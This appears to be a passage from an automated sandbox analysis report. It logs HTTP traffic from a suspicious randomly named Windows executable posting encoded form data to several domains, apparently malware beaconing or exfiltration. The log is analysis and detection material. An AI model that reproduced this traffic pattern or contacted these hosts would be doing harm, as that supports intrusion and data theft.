                                                          Date: Fri, 12 Jul 2024 22:04:15 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=sa9nccl13qdc11am521vrveose; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          Content-Encoding: gzip
                                                          Data Raw: 35 35 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 a5 57 cd 6e dc 36 10 3e db 4f c1 ea 50 b7 c0 ee ca 4e 93 d6 48 24 19 69 62 03 29 82 1c f2 07 f4 54 70 25 ee 8a 36 45 ca 24 b5 1b 3d 41 df a0 bd 14 bd 15 05 8a f6 d0 5b ef 79 95 22 e8 63 f4 1b 52 da 9f c0 09 02 78 61 60 b9 d2 cc 37 33 df fc d1 87 59 ed 1b 55 1c 66 b5 e0 55 71 78 90 79 e9 95 28 1e 9b 86 4b cd 5e 74 ae 15 da 49 a3 b3 34 be 80 44 23 3c 67 b5 f7 ed 54 5c 77 72 95 27 8f 8c f6 42 fb e9 cb be 15 09 2b e3 af 3c f1 e2 8d 4f 09 fd 01 2b 6b 6e 9d f0 79 e7 17 d3 d3 84 cc 28 a9 af 58 6d c5 22 3f 22 28 77 3f 4d 17 50 74 b3 a5 31 4b 25 78 2b dd ac 34 4d 5a 3a 77 b6 e0 8d 54 7d fe dc cc 8d 37 f7 ef 1e 1f 4f be 3a 3e 3e 62 56 a8 fc c8 f9 5e 09 57 0b e1 8f 98 87 fd fc 28 98 85 da 11 cc 8c 86 48 34 d9 8a 26 d1 72 52 71 cf d3 f8 38 7e cd a0 b7 75 ef 13 b4 14 bc 0c 2a 59 1a 09 cc e6 a6 ea 59 a9 b8 73 60 80 cf 95 98 ae 2d 6f 5b 61 03 ae 2b ad 6c 3d 73 b6 cc 93 31 ee f5 7a 3d 44 1d 22 b6 a2 e4 ad 07 63 29 48 98 5d ba b3 5a e5 42 27 45 96 46 e5 e2 f0 30 ab e4 6a [TRUNCATED]
                                                          Data Ascii: 554Wn6>OPNH$ib)Tp%6E$=A[y"cRxa`73YUfUqxy(K^tI4D#<gT\wr'B+<O+kny(Xm"?"(w?MPt1K%x+4MZ:wT}7O:>>bV^W(H4&rRq8~u*YYs`-o[a+l=s1z=D"c)H]ZB'EF0jF),Ik}\P8<8`QS'(=^2-m/I/O#<cZqd}1a'r,"9+OfY{yduz^lU#D^*,DX@q,.,oB78E]y[_/({-}-X_~o\x\[TXhsfU""w9za>BwP{'7MC</R:&u4r!KY!q']-<zZgm8gK-*8u\X7HDx97lO*xjX]=0LC}-5+Y;k3k-#|3O/<!:a0*D>@t7CPwL RxX'X{7c/.E s[`Nv-;h
                                                          Jul 13, 2024 00:04:15.616588116 CEST506INData Raw: 2d 73 81 71 6d 98 32 88 d6 22 67 ce a8 95 80 8d 0b 84 12 f8 1f 52 03 13 06 8b 83 6c 50 96 07 41 a6 a9 c6 94 ea 27 ac c5 a2 74 62 f4 e3 83 a9 db a6 6a 00 1e 33 36 c2 0a a0 53 14 7b a4 44 52 e1 03 e1 a2 9b 16 c8 1e e4 b0 94 61 76 08 7b 4f 01 a8 25
                                                          Data Ascii: -sqm2"gRlPA'tbj36S{DRav{O%8bE% ;sr5RA$ajv%YM)p{7{N8kQ&'V6gszUxR|E)77%esr]/W


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.64974651.89.93.192805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:04:17.518085957 CEST1759OUTPOST /wlsq/ HTTP/1.1
                                                          Host: www.noghteyab.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.noghteyab.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.noghteyab.com/wlsq/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 77 45 56 70 5a 6b 48 4f 30 6c 53 61 36 57 2f 41 76 50 66 6b 65 30 76 53 42 34 59 44 44 48 6b 46 66 43 54 46 79 71 6b 61 74 39 5a 6b 38 50 7a 76 6c 78 42 74 4b 57 56 6c 63 39 77 39 75 78 41 43 4c 75 72 48 6c 61 72 54 76 62 32 4b 46 4f 33 6b 58 6e 6e 58 30 32 46 67 61 35 7a 6b 43 44 6a 49 4a 71 63 54 30 50 74 74 78 76 4a 38 4b 6f 4d 46 4a 4d 75 7a 6a 61 4f 48 43 2b 66 79 2f 32 43 53 4c 74 62 2b 6d 2b 42 77 65 44 7a 77 53 54 4f 4a 73 77 7a 43 77 57 56 4f 78 57 73 44 49 63 39 34 65 38 54 6d 51 74 34 45 48 2b 76 34 37 35 55 4e 46 51 4b 41 50 4c 45 66 5a 4d 43 4c 38 6b 2f 34 34 72 64 31 2f 78 4f 76 7a 34 55 67 59 30 59 7a 41 6a 31 35 68 6f 57 51 5a 45 61 50 4b 2b 32 73 65 65 71 53 79 30 78 36 6e 49 69 5a 69 2b 6f 4f 47 39 6d 47 32 6e 71 64 54 33 4b 46 64 44 57 55 41 6b 52 43 65 6d 6c 73 4f 6b 44 54 34 75 57 35 58 6b 68 71 49 53 41 37 30 78 62 53 50 74 41 4f 57 2f 61 6b 30 49 2b 5a 77 78 41 71 43 72 4b 6a 32 75 6d 32 33 32 67 39 58 47 35 76 73 44 38 6f 69 57 58 6e 4e 59 30 64 4d 73 [TRUNCATED]
                                                          Data Ascii: D0Pts04=wEVpZkHO0lSa6W/AvPfke0vSB4YDDHkFfCTFyqkat9Zk8PzvlxBtKWVlc9w9uxACLurHlarTvb2KFO3kXnnX02Fga5zkCDjIJqcT0PttxvJ8KoMFJMuzjaOHC+fy/2CSLtb+m+BweDzwSTOJswzCwWVOxWsDIc94e8TmQt4EH+v475UNFQKAPLEfZMCL8k/44rd1/xOvz4UgY0YzAj15hoWQZEaPK+2seeqSy0x6nIiZi+oOG9mG2nqdT3KFdDWUAkRCemlsOkDT4uW5XkhqISA70xbSPtAOW/ak0I+ZwxAqCrKj2um232g9XG5vsD8oiWXnNY0dMsNyeptAtNduO8ux6MTAoX4jiR8Ii6e9851tnLafO/aYz47KWavc+tZh6CIZMIxjSS3B/NzJrFQd42mhOwPwouR/qGDVeCw/E+B6po8ov4CAJOyMk8evvSd5XJF5568k0cK15+AxMfUVx5UFNhbxRoUGhpNrmxKyIP2TqgWFoClawjpA3u5lzMrtLeF6RbBdDUIHC/0hj00p9rSFLljQpl2THfkr/cszJJfExiWUe79FXAikeV7n4wjZuETF8JvnyZX5o7qkj1HopwXn5L6dtLg/q4Bl7uk90L2UQuvHFY8v+QjR+JLVpYP97EaWsP7HnzZRdFm63d9IZl0f8ZN3TUvepsl2K81LQs+LiwzUcULGxmnsJMfYXrva4uO/rUtubH0emCUBoAjj0RXvICS6TCDG2gVm12N4Rvl2ug9owOQbw16xJ9/0wq0apKRSe8oFSlPDttunpJsox4ASiflkzcXxVOg7jkIoyWJz4R8Z0Bn5fOe+esBU/5OYLBS9OMV4MPcZDAuDptXnTidHrYXwjhUEIVHZh7FWhFhh4klw4wLahMd7CAGwgJ9eRZn8VWZFoUfsDEL6+4Xi9lFlW28ftt4nfdduYLqupl7fRw30xAtkoMLBDAm0HghUQmE+tHF/EgujWSFM/PZ8BgtT65cB+0hkWwqLJgzWBejg [TRUNCATED]
                                                          Jul 13, 2024 00:04:18.154594898 CEST1236INHTTP/1.1 200 OK
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Fri, 12 Jul 2024 22:04:18 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=1sk8rsuoi1lhaen026plm6b4d7; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          Content-Encoding: gzip
                                                          Data Raw: 35 35 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 a5 57 cd 6e dc 36 10 3e db 4f c1 ea 50 b7 c0 ee ca 4e 93 d6 48 24 19 69 62 03 29 82 1c f2 07 f4 54 70 25 ee 8a 36 45 ca 24 b5 1b 3d 41 df a0 bd 14 bd 15 05 8a f6 d0 5b ef 79 95 22 e8 63 f4 1b 52 da 9f c0 09 02 78 61 60 b9 d2 cc 37 33 df fc d1 87 59 ed 1b 55 1c 66 b5 e0 55 71 78 90 79 e9 95 28 1e 9b 86 4b cd 5e 74 ae 15 da 49 a3 b3 34 be 80 44 23 3c 67 b5 f7 ed 54 5c 77 72 95 27 8f 8c f6 42 fb e9 cb be 15 09 2b e3 af 3c f1 e2 8d 4f 09 fd 01 2b 6b 6e 9d f0 79 e7 17 d3 d3 84 cc 28 a9 af 58 6d c5 22 3f 22 28 77 3f 4d 17 50 74 b3 a5 31 4b 25 78 2b dd ac 34 4d 5a 3a 77 b6 e0 8d 54 7d fe dc cc 8d 37 f7 ef 1e 1f 4f be 3a 3e 3e 62 56 a8 fc c8 f9 5e 09 57 0b e1 8f 98 87 fd fc 28 98 85 da 11 cc 8c 86 48 34 d9 8a 26 d1 72 52 71 cf d3 f8 38 7e cd a0 b7 75 ef 13 b4 14 bc 0c 2a 59 1a 09 cc e6 a6 ea 59 a9 b8 73 60 80 cf 95 98 ae 2d 6f 5b 61 03 ae 2b ad 6c 3d 73 b6 cc 93 31 ee f5 7a 3d 44 1d 22 b6 a2 e4 ad 07 63 29 48 98 5d ba b3 5a e5 42 27 45 96 46 e5 e2 f0 30 ab e4 6a [TRUNCATED]
                                                          Data Ascii: 554Wn6>OPNH$ib)Tp%6E$=A[y"cRxa`73YUfUqxy(K^tI4D#<gT\wr'B+<O+kny(Xm"?"(w?MPt1K%x+4MZ:wT}7O:>>bV^W(H4&rRq8~u*YYs`-o[a+l=s1z=D"c)H]ZB'EF0jF),Ik}\P8<8`QS'(=^2-m/I/O#<cZqd}1a'r,"9+OfY{yduz^lU#D^*,DX@q,.,oB78E]y[_/({-}-X_~o\x\[TXhsfU""w9za>BwP{'7MC</R:&u4r!KY!q']-<zZgm8gK-*8u\X7HDx97lO*xjX]=0LC}-5+Y;k3k-#|3O/<!:a0*D>@t7CPwL RxX'X{7c/.E s[`Nv-;h
                                                          Jul 13, 2024 00:04:18.154643059 CEST506INData Raw: 2d 73 81 71 6d 98 32 88 d6 22 67 ce a8 95 80 8d 0b 84 12 f8 1f 52 03 13 06 8b 83 6c 50 96 07 41 a6 a9 c6 94 ea 27 ac c5 a2 74 62 f4 e3 83 a9 db a6 6a 00 1e 33 36 c2 0a a0 53 14 7b a4 44 52 e1 03 e1 a2 9b 16 c8 1e e4 b0 94 61 76 08 7b 4f 01 a8 25
                                                          Data Ascii: -sqm2"gRlPA'tbj36S{DRav{O%8bE% ;sr5RA$ajv%YM)p{7{N8kQ&'V6gszUxR|E)77%esr]/W


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.64974751.89.93.192805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:04:20.054097891 CEST467OUTGET /wlsq/?D0Pts04=9G9JaQreu1q7pVWdntSqemfrZt4YMEwdEWH52d0+9tQM8/+noicIREkWd/c/vCZ1acCjjeuAo42rGPHTfjnYxH4zd6/SeR7TYZgVkfp3oOFdRtlOKMiyqIOaPcilhWS9JI76xLs=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.noghteyab.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:04:20.682537079 CEST1236INHTTP/1.1 200 OK
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Fri, 12 Jul 2024 22:04:20 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=fcvfe57hljgq72sn8l4jeab5ap; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          Data Raw: 31 30 38 63 0d 0a 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 53 75 73 70 65 6e 73 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 09 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 64 61 74 61 2f 73 74 79 6c 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 64 61 74 61 2f 73 74 79 6c 65 73 2f 6c 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 [TRUNCATED]
                                                          Data Ascii: 108c<html><head><title>Domain Suspension</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><link href='https://fonts.googleapis.com/css?family=Roboto:400,300' rel='stylesheet' type='text/css'><link rel="stylesheet" href="data/styles/style.css"><link rel="stylesheet" href="data/styles/ls.css"></head><body class="table-wrapper"><script src="https://www.google.com/recaptcha/api.js?hl=en"></script><div class="table-cell"><div id="container" style="position:relative;"><div id="country-select"> <form action=""> <select id="country-options" name="country-options"> <option selected="selected" title="//www.noghteyab.com/wlsq/?D0Pts04=9G9JaQreu1q7pVWdntSqemfrZt4YMEwdEWH52d0+9tQM8/+noicIREkWd/c/vCZ1acCjjeuAo42rGPHTfjnYxH4zd6/SeR7TYZgVkfp3oOFdRtlOKMiyqIOaPcilhWS9JI76xLs=&Q8s=tdcd5h7ptjmdxx&lang=en" value="en">English</option>
                                                          Jul 13, 2024 00:04:20.682598114 CEST1236INData Raw: 20 20 3c 6f 70 74 69 6f 6e 20 20 74 69 74 6c 65 3d 22 2f 2f 77 77 77 2e 6e 6f 67 68 74 65 79 61 62 2e 63 6f 6d 2f 77 6c 73 71 2f 3f 44 30 50 74 73 30 34 3d 39 47 39 4a 61 51 72 65 75 31 71 37 70 56 57 64 6e 74 53 71 65 6d 66 72 5a 74 34 59 4d 45
                                                          Data Ascii: <option title="//www.noghteyab.com/wlsq/?D0Pts04=9G9JaQreu1q7pVWdntSqemfrZt4YMEwdEWH52d0+9tQM8/+noicIREkWd/c/vCZ1acCjjeuAo42rGPHTfjnYxH4zd6/SeR7TYZgVkfp3oOFdRtlOKMiyqIOaPcilhWS9JI76xLs=&Q8s=tdcd5h7ptjmdxx&lang=fr" value="fr">Franais</opti
                                                          Jul 13, 2024 00:04:20.682636023 CEST1236INData Raw: 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 20 74 69 74 6c 65 3d 22 2f 2f 77 77 77 2e 6e 6f 67 68 74 65 79 61 62 2e 63 6f 6d 2f 77 6c 73 71 2f 3f 44 30 50 74 73 30 34 3d 39 47 39 4a 61 51 72 65 75 31 71 37 70 56 57 64 6e
                                                          Data Ascii: /option> <option title="//www.noghteyab.com/wlsq/?D0Pts04=9G9JaQreu1q7pVWdntSqemfrZt4YMEwdEWH52d0+9tQM8/+noicIREkWd/c/vCZ1acCjjeuAo42rGPHTfjnYxH4zd6/SeR7TYZgVkfp3oOFdRtlOKMiyqIOaPcilhWS9JI76xLs=&Q8s=tdcd5h7ptjmdxx&lang=es" value="es">Es
                                                          Jul 13, 2024 00:04:20.682670116 CEST883INData Raw: 67 20 64 65 6c 65 74 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 6f 6e 20 75 70 64 61 74 69 6e 67 20 79 6f 75 72 20 63 6f 6e 74 61 63 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63
                                                          Data Ascii: g deleted. For more information on updating your contact information please contact your domain service provider.</p></div><div id="captcha"><p>Enter the text displayed in the image below, then click the resend button to ha


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.6497483.33.130.190805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:04:25.730942011 CEST734OUTPOST /22y6/ HTTP/1.1
                                                          Host: www.mcpcrecycling.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.mcpcrecycling.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.mcpcrecycling.com/22y6/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 46 41 47 34 38 46 5a 7a 4e 45 50 55 4e 70 49 4e 61 61 44 50 38 43 54 42 44 74 50 56 7a 31 4f 37 6f 42 4d 30 62 6c 6e 56 69 6b 50 53 31 47 43 6c 56 64 54 41 67 48 51 76 52 67 63 73 4b 46 31 6f 63 46 33 6d 6f 38 38 71 4f 6b 45 66 30 41 37 6d 79 4e 6e 66 4a 70 52 46 5a 56 44 38 44 68 4f 49 64 47 6b 33 61 34 54 71 7a 37 6a 48 38 4c 6f 42 6b 4c 35 33 35 76 6b 54 73 74 77 64 37 55 53 58 65 46 73 30 4d 61 57 77 47 47 75 49 4c 50 33 70 51 74 36 57 6e 76 51 65 38 4d 31 2b 67 76 78 39 42 6f 37 72 42 6a 63 49 70 5a 41 6f 5a 73 69 55 58 54 35 65 36 76 61 66 49 4c 79 2f 49 75 56 32 76 79 34 4a 6d 34 6b 7a 68 6d 6c 31
                                                          Data Ascii: D0Pts04=FAG48FZzNEPUNpINaaDP8CTBDtPVz1O7oBM0blnVikPS1GClVdTAgHQvRgcsKF1ocF3mo88qOkEf0A7myNnfJpRFZVD8DhOIdGk3a4Tqz7jH8LoBkL535vkTstwd7USXeFs0MaWwGGuILP3pQt6WnvQe8M1+gvx9Bo7rBjcIpZAoZsiUXT5e6vafILy/IuV2vy4Jm4kzhml1


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.6497493.33.130.190805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:04:28.268542051 CEST758OUTPOST /22y6/ HTTP/1.1
                                                          Host: www.mcpcrecycling.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.mcpcrecycling.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.mcpcrecycling.com/22y6/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 46 41 47 34 38 46 5a 7a 4e 45 50 55 50 4a 34 4e 59 35 62 50 31 43 54 43 66 64 50 56 68 31 50 77 6f 42 41 30 62 6e 4c 37 69 32 37 53 30 6a 6d 6c 55 59 76 41 6a 48 51 76 57 51 64 6b 45 6c 31 6e 63 46 7a 51 6f 39 77 71 4f 6b 51 66 30 46 2f 6d 79 2b 66 63 47 5a 52 4c 4e 6c 44 45 4e 42 4f 49 64 47 6b 33 61 34 48 41 7a 37 37 48 38 37 59 42 6e 75 56 32 77 50 6b 51 6b 4e 77 64 2f 55 53 62 65 46 73 4b 4d 59 79 61 47 44 69 49 4c 4b 62 70 54 2f 65 58 74 76 51 59 68 38 30 69 77 2f 30 77 50 36 69 4d 46 46 63 52 2b 4a 6b 57 63 61 6a 4f 4c 67 35 39 6f 2f 36 64 49 4a 71 4e 49 4f 56 63 74 79 41 4a 30 76 6f 55 75 53 41 57 77 76 2b 34 67 4b 30 6f 32 66 78 52 34 32 52 75 4a 52 49 65 49 51 3d 3d
                                                          Data Ascii: D0Pts04=FAG48FZzNEPUPJ4NY5bP1CTCfdPVh1PwoBA0bnL7i27S0jmlUYvAjHQvWQdkEl1ncFzQo9wqOkQf0F/my+fcGZRLNlDENBOIdGk3a4HAz77H87YBnuV2wPkQkNwd/USbeFsKMYyaGDiILKbpT/eXtvQYh80iw/0wP6iMFFcR+JkWcajOLg59o/6dIJqNIOVctyAJ0voUuSAWwv+4gK0o2fxR42RuJRIeIQ==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.6497503.33.130.190805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:04:30.797411919 CEST1771OUTPOST /22y6/ HTTP/1.1
                                                          Host: www.mcpcrecycling.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.mcpcrecycling.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.mcpcrecycling.com/22y6/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 46 41 47 34 38 46 5a 7a 4e 45 50 55 50 4a 34 4e 59 35 62 50 31 43 54 43 66 64 50 56 68 31 50 77 6f 42 41 30 62 6e 4c 37 69 32 44 53 30 56 71 6c 56 2f 37 41 69 48 51 76 56 51 64 6e 45 6c 31 36 63 42 6e 4d 6f 39 73 36 4f 6d 6f 66 30 6a 44 6d 30 50 66 63 64 70 52 4c 53 31 44 2f 44 68 50 49 64 47 30 7a 61 34 58 41 7a 37 37 48 38 34 41 42 7a 4c 35 32 79 50 6b 54 73 74 77 52 37 55 54 4d 65 42 4a 78 4d 59 6d 67 47 51 71 49 4c 75 37 70 44 63 36 58 77 66 51 61 69 38 30 71 77 2b 4a 77 50 36 75 71 46 46 41 76 2b 4b 34 57 63 38 71 56 54 68 5a 6e 72 2b 2b 59 58 61 75 59 47 65 4d 72 76 51 63 4c 30 75 78 6e 6e 54 42 31 6f 70 79 35 79 63 35 50 78 70 38 2f 32 68 67 51 49 78 56 79 54 4a 30 33 78 4c 4f 63 46 4f 55 4f 74 46 35 70 6f 4c 6b 69 39 41 79 58 52 2f 47 59 48 37 7a 4b 76 6e 56 39 47 45 67 41 76 52 4e 75 32 52 79 68 30 56 4a 2b 4f 6d 42 71 32 6b 66 30 53 31 70 75 52 67 4a 66 48 54 45 47 2b 4c 4f 68 39 35 79 6c 68 53 30 59 37 6e 37 76 2b 51 7a 72 33 41 4a 48 79 44 73 52 54 79 6f 39 73 4a [TRUNCATED]
                                                          Data Ascii: D0Pts04=FAG48FZzNEPUPJ4NY5bP1CTCfdPVh1PwoBA0bnL7i2DS0VqlV/7AiHQvVQdnEl16cBnMo9s6Omof0jDm0PfcdpRLS1D/DhPIdG0za4XAz77H84ABzL52yPkTstwR7UTMeBJxMYmgGQqILu7pDc6XwfQai80qw+JwP6uqFFAv+K4Wc8qVThZnr++YXauYGeMrvQcL0uxnnTB1opy5yc5Pxp8/2hgQIxVyTJ03xLOcFOUOtF5poLki9AyXR/GYH7zKvnV9GEgAvRNu2Ryh0VJ+OmBq2kf0S1puRgJfHTEG+LOh95ylhS0Y7n7v+Qzr3AJHyDsRTyo9sJogrSOhy6RVtMRyXPbkri49/CJNufDCbFp3buD0KC5F5hEL5OrGZ+5FrZdo1yYEd9sPl6+NVb5S5KAXjqNzwM9WA9aABEUesjLMjZG8SV6esr4sm4CbVga5nJdjzcprQL2dzadiyW0qG1ORuhFoUFpblYC6hoCCzaXELuf/ei1itvU0t7cEykpLRg6jhQP5tbgiqKzYfoX8d0SEJLWrG3rJNmxsGJ23UIaynWhafSZTpHmBT5VAsCOATKstGRCCWUeqadRPyDi6ksvyBQx/P6mEVwy3FoPuNm4OjHv5q3bJmz861HZ2J2ZuJJtIeiy0zf+ZDxZh5apm6R1H0WQWb0CBuErpk6YgNmcrSc/Ta5ILw6qui//sa5AJ80/l30gprqpvwv6WMKzKRr0Abd8adQRzJRw0G+zUl2OK2KvXwJtv36JGC6E7m0g3pbAurgeIwwoGWEfFoZpyKYX9CSoPGm4k7ZQviNqKssweZ4Q0RISGCPPkUuxyuPrEQDxsOlTgkdPXO2y1wI2RHFdpQ8RSQazIVUTVl7C7YUmBbLZ6u8ycgH2rGwTxRFyHU4yaBqWLC4YHDt4eIuEJGuwdh9RGaKRqtbTyy78kRwpPWe+SCPsjgqyB8OAXquBmTQBqgK+Oe3sMU2Dxw4cYq4cjG6VDaiYwQJGv8wZA8D1J [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.6497513.33.130.190805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:04:33.327718019 CEST471OUTGET /22y6/?D0Pts04=ICuY/wpnSFLYWqZfe4Os/gHcG43vkkyt4BwQQiH2zV3f9F/XRNyagXQgakBjN0QcNA+3ga87AEREzxLt9aLMOqMkXFbmJEqSPlZqGaa0hprb88Yx6Msm+f4viNx2oGL3e10rb/0=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.mcpcrecycling.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:04:33.785254955 CEST418INHTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Fri, 12 Jul 2024 22:04:33 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 278
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 44 30 50 74 73 30 34 3d 49 43 75 59 2f 77 70 6e 53 46 4c 59 57 71 5a 66 65 34 4f 73 2f 67 48 63 47 34 33 76 6b 6b 79 74 34 42 77 51 51 69 48 32 7a 56 33 66 39 46 2f 58 52 4e 79 61 67 58 51 67 61 6b 42 6a 4e 30 51 63 4e 41 2b 33 67 61 38 37 41 45 52 45 7a 78 4c 74 39 61 4c 4d 4f 71 4d 6b 58 46 62 6d 4a 45 71 53 50 6c 5a 71 47 61 61 30 68 70 72 62 38 38 59 78 36 4d 73 6d 2b 66 34 76 69 4e 78 32 6f 47 4c 33 65 31 30 72 62 2f 30 3d 26 51 38 73 3d 74 64 63 64 35 68 37 70 74 6a 6d 64 78 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
